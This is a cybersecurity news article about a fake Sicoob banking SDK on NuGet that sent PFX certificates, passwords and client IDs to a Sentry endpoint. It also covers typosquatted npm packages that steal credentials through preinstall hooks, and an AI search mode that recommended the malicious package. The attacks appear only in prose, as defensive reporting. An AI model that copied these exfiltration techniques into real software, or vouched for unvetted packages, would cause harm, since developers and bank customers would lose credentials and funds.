Malicious Sicoob NuGet Package Exfiltrates Banking Credentials, Amid Surge in npm Package Attacks
Cybersecurity researchers have identified a malicious NuGet package disguised as a C# software development kit for Sicoob, one of Brazil’s largest cooperative financial systems. This package has been designed to extract sensitive client IDs and PFX certificates, which are crucial for authenticating businesses within the Sicoob banking network.
Discovery of the Malicious Package
Versions 2.0.0 through 2.0.4 of the package named “Sicoob.Sdk” contain functionality that allows for the exfiltration of sensitive information. This includes PFX certificates, which are essential for automating banking operations such as processing instant payments and generating dynamic Pix QR codes. The malicious package is estimated to have been downloaded nearly 500 times, raising significant concerns regarding its potential impact on users.
According to security researcher Kirill Boychenko, when a developer initializes the SicoobClient with a client ID, PFX file path, and PFX password, the package reads the PFX file from the disk, Base64-encodes its contents, and transmits the client ID, PFX password, and encoded PFX data to a hardcoded third-party Sentry endpoint. This method of data exfiltration poses a serious risk to users who may unknowingly integrate this package into their applications.
Broader Implications for Financial Transactions
The malicious package is also capable of capturing raw Boleto API responses through a separate Sentry path. Boleto is a widely used cash payment method in Brazil, facilitating both online and offline transactions. The potential exposure of sensitive transaction details—including payment status, amounts, due dates, identifiers, and payer or payee data—could lead to severe financial repercussions for affected users.
The compromised data could enable threat actors to impersonate victims’ Sicoob banking API integrations, further amplifying the risks associated with this attack. Following responsible disclosure, NuGet has blocked the malicious package, and the profile behind it, named “sicoob,” has listed 11 other NuGet packages that collectively account for approximately 6,000 downloads.
The Role of AI in Amplifying Threats
The application security company Socket reported that the malicious package was surfaced by Google Search AI Mode as a legitimate C# library for interacting with Sicoob banking APIs. This amplification could mislead unsuspecting developers searching for legitimate tools, increasing the likelihood of accidental integration of the malicious package into their projects.
Another critical aspect of this attack is the mismatch between the source code in the linked GitHub repository and the artifact distributed via NuGet. The GitHub repository appears to be clean and legitimate, potentially lending an air of authenticity to the malicious package while concealing its harmful functionality.
Recommendations for Affected Organizations
Organizations that have installed the “Sicoob.Sdk” package are strongly advised to take immediate action. This includes removing the package, treating PFX material as compromised, replacing exposed PFX certificates, rotating PFX passwords, and changing or disabling affected client IDs where applicable. Additionally, auditing Sicoob authentication and API logs for signs of unusual activity is recommended to mitigate potential damage.
Context of Recent npm Package Attacks
This incident coincides with the discovery of 14 malicious npm packages that typosquat well-known libraries, including OpenSearch and ElasticSearch. These packages are designed to harvest AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD pipeline secrets from the host environment through a preinstall hook.
The Microsoft Defender Security Research Team reported that these malicious packages were published by a single threat actor identified as “vpmdhaj.” The packages include names such as “@vpmdhaj/devops-tools” and “@vpmdhaj/elastic-helper,” among others. This campaign is part of a broader trend of supply chain attacks targeting the npm ecosystem, which has seen a staggering increase in malicious activity.
Evolving Techniques in Supply Chain Attacks
Recent reports indicate that threat actors are moving beyond traditional typosquatting techniques, employing more sophisticated methods to create convincing package names that blend seamlessly into legitimate developer workflows. This evolution transforms routine installation steps into pathways for reconnaissance, credential theft, and further compromise.
Sonatype, a supply chain security company, noted that the broader pattern observed is one of manufactured legitimacy. Attackers are designing package names to appear plausible and useful, thereby increasing the chances of successful infiltration into development environments.
Conclusion
The emergence of the malicious Sicoob NuGet package highlights the ongoing vulnerabilities within software supply chains, particularly in the context of financial applications. As cyber threats continue to evolve, organizations must remain vigilant and proactive in their security measures to protect sensitive data and maintain the integrity of their systems.
Source: thehackernews.com
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
